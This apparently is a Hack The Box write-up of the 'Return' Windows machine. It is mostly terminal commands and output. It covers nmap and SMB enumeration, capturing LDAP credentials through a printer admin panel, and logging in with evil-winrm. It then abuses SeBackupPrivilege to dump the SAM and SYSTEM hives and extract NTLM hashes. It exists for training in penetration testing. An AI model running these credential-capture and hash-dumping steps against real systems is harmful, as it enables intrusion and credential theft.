Return
Nmap Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
| # Nmap 7.95 scan initiated Mon Jun 2 08:08:48 2025 as: /usr/lib/nmap/nmap -sC -sV -vv -oN nmap 10.10.11.108
Nmap scan report for 10.10.11.108
Host is up, received echo-reply ttl 127 (0.083s latency).
Scanned at 2025-06-02 08:08:48 CDT for 25s
Not shown: 987 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-title: HTB Printer Admin Panel
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-06-02 05:06:27Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 31931/tcp): CLEAN (Couldn't connect)
| Check 2 (port 37579/tcp): CLEAN (Couldn't connect)
| Check 3 (port 26260/udp): CLEAN (Timeout)
| Check 4 (port 19461/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: -8h02m27s
| smb2-time:
| date: 2025-06-02T05:06:38
|_ start_date: N/A
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jun 2 08:09:13 2025 -- 1 IP address (1 host up) scanned in 24.98 seconds
|
SMB Enumeration
1
2
3
4
5
| ┌──(wzwr㉿kali)-[~/Documents/htb/return]
└─$ crackmapexec smb 10.10.11.108 -u '' -p '' --shares
SMB 10.10.11.108 445 PRINTER [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
SMB 10.10.11.108 445 PRINTER [+] return.local\:
SMB 10.10.11.108 445 PRINTER [-] Error enumerating shares: STATUS_ACCESS_DENIED
|
1
2
3
4
5
6
7
8
9
10
11
12
| ┌──(wzwr㉿kali)-[~/Documents/htb/return]
└─$ crackmapexec smb 10.10.11.108 -u 'svc-printer' -p '1edFg43012!!' --shares
SMB 10.10.11.108 445 PRINTER [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
SMB 10.10.11.108 445 PRINTER [+] return.local\svc-printer:1edFg43012!!
SMB 10.10.11.108 445 PRINTER [+] Enumerated shares
SMB 10.10.11.108 445 PRINTER Share Permissions Remark
SMB 10.10.11.108 445 PRINTER ----- ----------- ------
SMB 10.10.11.108 445 PRINTER ADMIN$ READ Remote Admin
SMB 10.10.11.108 445 PRINTER C$ READ,WRITE Default share
SMB 10.10.11.108 445 PRINTER IPC$ READ Remote IPC
SMB 10.10.11.108 445 PRINTER NETLOGON READ Logon server share
SMB 10.10.11.108 445 PRINTER SYSVOL READ Logon server share
|
HTTP Enumeration
Did we find a password? Nope…
We can check the request
It seems to send a request to the IP address specified in the parameter. I tried setting the IP address to my machine to see what happens.
1
2
3
4
5
6
7
| ┌──(wzwr㉿kali)-[~/Documents/htb/return]
└─$ nc -lvnp 389
listening on [any] 389 ...
connect to [10.10.16.24] from (UNKNOWN) [10.10.11.108] 63695
0*`%return\svc-printer
1edFg43012!!
|
We captured the credentials!
WINRM enumeration
1
2
3
4
5
| ┌──(wzwr㉿kali)-[~/Documents/htb/return]
└─$ crackmapexec winrm 10.10.11.108 -u 'svc-printer' -p '1edFg43012!!'
SMB 10.10.11.108 5985 PRINTER [*] Windows 10 / Server 2019 Build 17763 (name:PRINTER) (domain:return.local)
HTTP 10.10.11.108 5985 PRINTER [*] http://10.10.11.108:5985/wsman
WINRM 10.10.11.108 5985 PRINTER [+] return.local\svc-printer:1edFg43012!! (Pwn3d!)
|
1
2
3
4
5
6
7
8
9
10
11
12
13
| ┌──(wzwr㉿kali)-[~/Documents/htb/return]
└─$ evil-winrm -i 10.10.11.108 -u 'svc-printer' -p '1edFg43012!!'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-printer\Documents> whoami
return\svc-printer
*Evil-WinRM* PS C:\Users\svc-printer\Documents>
|
Post-Exploitation
Quick Check
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
| *Evil-WinRM* PS C:\Users\svc-printer> net user /domain
User accounts for \\
-------------------------------------------------------------------------------
Administrator Guest krbtgt
svc-printer
The command completed with one or more errors.
*Evil-WinRM* PS C:\Users\svc-printer> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemtimePrivilege Change the system time Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
|
Hmm… we have a lot of privileges! The most interesting one is SeBackupPrivilege. Let’s abuse this token.
Abuse Backup Privileges
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
| *Evil-WinRM* PS C:\Users\svc-printer> reg save hklm\sam C:\Users\svc-printer\sam.hive
The operation completed successfully.
*Evil-WinRM* PS C:\Users\svc-printer> reg save hklm\system C:\Users\svc-printer\system.hive
The operation completed successfully.
*Evil-WinRM* PS C:\Users\svc-printer> download sam.hive
Info: Downloading C:\Users\svc-printer\sam.hive to sam.hive
Info: Download successful!
*Evil-WinRM* PS C:\Users\svc-printer> download system.hive
Info: Downloading C:\Users\svc-printer\system.hive to system.hive
Info: Download successful!
*Evil-WinRM* PS C:\Users\svc-printer>
|
1
2
3
4
5
6
7
8
9
10
11
| ┌──(wzwr㉿kali)-[~/Documents/htb/return]
└─$ impacket-secretsdump -sam sam.hive -system system.hive LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0xa42289f69adb35cd67d02cc84e69c314
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:34386a771aaca697f447754e4863d38a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
|
